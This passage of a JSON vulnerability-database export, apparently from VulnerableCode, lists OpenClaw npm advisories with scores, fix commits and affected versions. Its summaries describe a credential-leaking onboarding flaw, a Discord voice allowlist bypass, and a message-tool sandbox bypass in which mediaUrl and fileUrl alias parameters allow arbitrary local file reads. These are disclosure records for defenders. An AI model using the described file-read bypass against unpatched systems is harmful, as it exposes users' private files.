aw/commit/176c059b05357df1bc09d4328a2380670859eeff"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj"},{"reference_url":"https://github.com/advisories/GHSA-w6wx-jq6j-6mcj","reference_id":"GHSA-w6wx-jq6j-6mcj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w6wx-jq6j-6mcj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"
},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"
},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-w6wx-jq6j-6mcj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-258k-a4dw-tfae"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90123?format=json","vulnerability_id":"VCID-26kp-dbu2-pqej","summary":"OpenClaw: Endpoint persists after trust decline, leaking gateway credentials\n## Summary\nRemote onboarding preserves attacker-discovered endpoint after trust decline, routing gateway credentials to it\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped onboarding trust-decline bug because the declined discovered URL survived into the manual prompt, but operator acceptance of that prefill is still required, so medium.\n\n## Affected Packages / 
Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a75416634837c21ed05b8c3ed906eb7a7807060` — 2026-03-30T20:03:06+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41300","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11185","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11219","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11226","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41300"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21
T13:02:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41300","reference_id":"CVE-2026-41300","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41300"},{"reference_url":"https://github.com/advisories/GHSA-9f4w-67g7-mqwv","reference_id":"GHSA-9f4w-67g7-mqwv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9f4w-67g7-mqwv"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding","reference_id":"openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1"
,"scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-df
dk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj
73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41300","GHSA-9f4w-67g7-mqwv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-26kp-dbu2-pqej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89601?format=json","vulnerability_id":"VCID-26sg-e29u-hkf3","summary":"OpenClaw: Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n## Summary\nDiscord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n\n## Current Maintainer Triage\n- Status: narrow\n- Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\nOpenClaw thanks @cyjhhh for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41382","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41382"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textu
al","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41382","reference_id":"CVE-2026-41382","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41382"},{"reference_url":"https://github.com/advisories/GHSA-x2m8-53h4-6hch","reference_id":"GHSA-x2m8-53h4-6hch","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x2m8-53h4-6hch"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps","reference_id":"openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:
N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk
"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn
"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41382","GHSA-x2m8-53h4-6hch"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-26sg-e29u-hkf3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91252?format=json","vulnerability_id":"VCID-26sv-grsd-abcw","summary":"Duplicate Advisory: OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-v8wv-jg3q-qwpq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.24 contains a sandbox bypass vulnerability in the message tool that allows attackers to read arbitrary local files by using mediaUrl and fileUrl alias parameters that bypass localRoots validation. 
Remote attackers can exploit this by routing file requests through unvalidated alias parameters to access files outside the intended sandbox 